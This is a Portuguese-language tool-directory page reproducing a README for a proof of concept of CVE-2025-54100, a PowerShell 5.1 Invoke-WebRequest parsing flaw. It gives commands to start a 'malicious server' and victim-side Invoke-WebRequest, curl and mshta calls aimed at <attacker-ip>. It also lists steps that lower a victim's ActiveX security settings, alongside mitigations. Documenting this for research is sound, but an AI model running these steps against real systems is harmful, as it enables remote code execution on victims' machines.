Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-54100 — CVE-2025-54100 (CVSS 7.8 High) é uma vulnerabilidade de injeção de comandos no cmdlet Invoke-WebRequest do Windows PowerShell 5.1. Ela decorre da neutralização inadequada de elementos especiais durante a análise automática de respostas da Web. | Kitploit
Ferramentas/GitHubGitHub/themehackers/cve-2025-54100
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubthemehackers/cve-2025-54100

CVE-2025-54100

CVE-2025-54100 (CVSS 7.8 High) é uma vulnerabilidade de injeção de comandos no cmdlet Invoke-WebRequest do Windows PowerShell 5.1. Ela decorre da neutralização inadequada de elementos especiais durante a análise automática de respostas da Web.

Ver Repositório
3174há 9 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-54100 – PoC de Análise de Resposta do PowerShell

Uma Prova de Conceito concisa que demonstra como CVE-2025-54100 pode levar à Execução Remota de Código (RCE) no Windows PowerShell 5.1 por meio da análise maliciosa de HTML.

Índice

  • O que é CVE-2025-54100?
  • Como o PoC Funciona
  • Início Rápido
  • Acionando a partir de um Host Vítima
  • Solução de Problemas e Verificação
  • Evidências
  • Mitigação
  • Aviso Legal
  • Referências

O que é CVE-2025-54100?

  • Tipo: Injeção de comandos no Invoke-WebRequest quando não é usado -UseBasicParsing
  • Gravidade: CVSS 7.8 (Alta)
  • Causa raiz: A análise baseada em MSHTML de respostas HTML permite a execução de script (ex.: ActiveXObject) no contexto do chamador.
  • Afetados: Windows 10/11 e Windows Server 2008-2025 executando PowerShell 5.1.
  • Como o PoC Funciona

    1. O servidor FastAPI em CVE-2025-54100.py serve um payload HTML especialmente criado.
    2. O payload tenta instanciar objetos ActiveX WScript.Shell / Shell.Application.
    3. Em hosts vulneráveis, o parser MSHTML executa o script, demonstrando RCE ao iniciar calc.exe.
    4. O payload fornecido é intencionalmente mínimo e não destrutivo, mas pode ser modificado para pesquisas adicionais.

    Início Rápido

    Pré-requisitos

    • Python 3.10+ (testado com FastAPI e Uvicorn)
    • Instale as dependências:
      root@kitploit:~
      python3 -m venv .venv
      source .venv/bin/activate
      pip3 install -r requirements.txt
      

    Execute o servidor malicioso

    Inicie o servidor HTTP do PoC:

    root@kitploit:~
    uvicorn app:app --host 0.0.0.0  --port 8888 --reload
    

    Acionando a partir de um Host Vítima

    Execute estes comandos em uma máquina Windows vulnerável sem -UseBasicParsing:

    root@kitploit:~
    # Invoke-WebRequest
    Invoke-WebRequest -Uri "http://<attacker-ip>:8888"
    # curl alias
    curl http://<attacker-ip>:8888
    # mshta
    mshta http://<attacker-ip>:8888
    

    Use a mesma porta que você configurou para o servidor. Se vulnerável, o script embutido é executado por meio do parser MSHTML. Alguns produtos de antivírus podem bloquear o comportamento mesmo que o problema de análise esteja presente.

    Solução de Problemas e Verificação

    Se o calc.exe não aparecer:

    1. Abra Opções da Internet na vítima.
    2. Vá em Segurança → Nível personalizado...
    3. Habilite “Inicializar e executar scripts de controles ActiveX não marcados como seguros para script.”
    4. Execute novamente Invoke-WebRequest sem -UseBasicParsing.

    Isso demonstra o vetor de execução. Payloads do mundo real podem usar ofuscação ou bypass adicionais para contornar as restrições padrão.

    Evidências

    PoC

    Mitigação

    A Microsoft corrigiu o problema em dezembro de 2025:

    1. Aplique as atualizações de segurança nos hosts Windows afetados.
    2. Use -UseBasicParsing para evitar a análise MSHTML:
      root@kitploit:~
      Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
      
    3. Migre para o PowerShell 7+ (pwsh), que não depende do MSHTML para análise.

    Aviso Legal

    [!WARNING] Apenas para fins educacionais e testes autorizados. Use com responsabilidade e cumpra todas as leis aplicáveis. Os autores não se responsabilizam por uso indevido ou danos.

    Referências

    • NVD: CVE-2025-54100
    • MSRC: Guia de Atualização
    • GitHub: osman1337-security/CVE-2025-54100
    Baixar ferramenta